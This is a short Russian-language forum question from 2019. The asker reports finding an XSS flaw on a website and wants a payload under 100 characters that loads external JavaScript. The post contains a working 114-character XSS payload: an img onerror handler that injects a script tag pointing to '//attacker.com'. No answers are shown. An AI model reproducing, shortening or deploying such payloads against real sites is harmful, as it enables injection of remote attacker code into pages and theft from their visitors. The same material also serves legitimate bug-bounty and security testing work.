Какой самый короткий код для динамической загрузки JS - PullRequest
0 голосов
/ 09 ноября 2019

Я нашел xss-уязвимость на веб-сайте и хочу использовать ее для увеличения количества ошибок. проблема: максимум 100 символов, и я хочу загрузить внешний JavaScript. На сайте нет jquery.

Это самый короткий xss для загрузки внешнего javascript, который я нашел, но его 114 символов. Возможно ли получить более короткий код? да, я знаю, что URL может быть короче, но это единственное. Я попробовал все.

<img src onerror="var d=document,s=d.createElement`script`;s.src='//attacker.com',d.querySelector`p`.appendChild(s)">
...